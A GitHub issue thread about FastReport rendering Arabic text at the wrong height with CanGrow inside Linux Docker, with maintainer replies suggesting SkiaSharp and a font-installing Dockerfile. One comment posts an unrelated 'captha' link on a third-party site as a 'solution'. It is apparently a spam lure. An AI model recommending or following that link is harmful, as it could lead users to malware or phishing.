### ISSUE TITLE
Problem with CanGrow with Arabic text on Docker

### ISSUE THREAD

**Issue by hanidraidi** [FastReports/FastReport#722]
I have .net app, I installed FastReport.OpenSource v 2025.1.0, and FastReport.OpenSource.Export.PdfSimple v 2025.1.0, When setting "CanGrow" to true for a text, and its value in Arabic it works fine on windows environement. However, when dockerizing the app, the CanGrow results in incorrect height of the text item when its text in Arabic as shown on screenshots below:

CanGrow set to true on **windows environment - Arabic Text** (Works fine):
![image](https://github.com/user-attachments/assets/3efb13c5-c0be-4953-8a38-c93042229563)

CanGrow set to true on **docker (linux environment) - Arabic Text** (Weired):
![image](https://github.com/user-attachments/assets/1f73c242-dc5d-43f7-9c68-afb1761bdcaf)

CanGrow set to true on **docker (linux environment) - English Text** (Works fine):
![image](https://github.com/user-attachments/assets/20a742ce-ee5d-43cd-bccf-5accbf84c8fa)

**Comment by Anshsahu0802** [comment]
maybe this solution will solve your problem [click](https://www.calvarywhangarei.co.nz/captha/index.html)

**Comment by Bykiev** [comment]
Hi, are you using `SkiaSharp` version?

**Comment by hanidraidi** [comment]
I am using [FastReport.OpenSource](https://www.nuget.org/packages/FastReport.OpenSource) and [FastReport.OpenSource.Export.PdfSimple](https://www.nuget.org/packages/FastReport.OpenSource.Export.PdfSimple)

**Comment by Bykiev** [comment]
This seems to be a known issue with System.Drawing. Did you try to use demo with SkiaSharp?

**Comment by BogdanStegachev** [comment]
Hello!

Could you do some testing with FastReport.Core.Skia.Demo and additional packages:

HarfBuzzSharp.NativeAssets.Linux
SkiaSharp.NativeAssets.Linux.NoDependencies

I also send you an example of a correct DockerFile:

```
FROM mcr.microsoft.com/dotnet/aspnet:8.0 AS base
WORKDIR /app

FROM mcr.microsoft.com/dotnet/aspnet:8.0 AS base
RUN apt-get update \
    && apt-get install -y wget \
    && rm -rf /var/lib/apt/lists/*
RUN echo ttf-mscorefonts-installer msttcorefonts/accepted-mscorefonts-eula \
    select true | debconf-set-selections
RUN apt-get update \
    && wget http://ftp.fr.debian.org/debian/pool/contrib/m/msttcorefonts/ttf-mscorefonts-installer_3.8_all.deb -P /Downloads \
    && apt-get install -y /Downloads/ttf-mscorefonts-installer_3.8_all.deb \
    && rm /Downloads/ttf-mscorefonts-installer_3.8_all.deb \
    && rm -rf /var/lib/apt/lists/*
WORKDIR /app
EXPOSE 80
EXPOSE 443



FROM mcr.microsoft.com/dotnet/sdk:8.0 AS build
ARG BUILD_CONFIGURATION=Release
WORKDIR /src
COPY ["FastReportSkia/FastReportSkia.csproj", "FastReportSkia/"]
RUN dotnet restore "./FastReportSkia/FastReportSkia.csproj"
COPY . .
WORKDIR "/src/FastReportSkia"
RUN dotnet build "./FastReportSkia.csproj" -c $BUILD_CONFIGURATION -o /app/build

FROM build AS publish
ARG BUILD_CONFIGURATION=Release
RUN dotnet publish "./FastReportSkia.csproj" -c $BUILD_CONFIGURATION -o /app/publish /p:UseAppHost=false

FROM base AS final
WORKDIR /app
COPY --from=publish /app/publish .
ENTRYPOINT ["dotnet", "FastReportSkia.dll"]
```


Best regards,
Bogdan
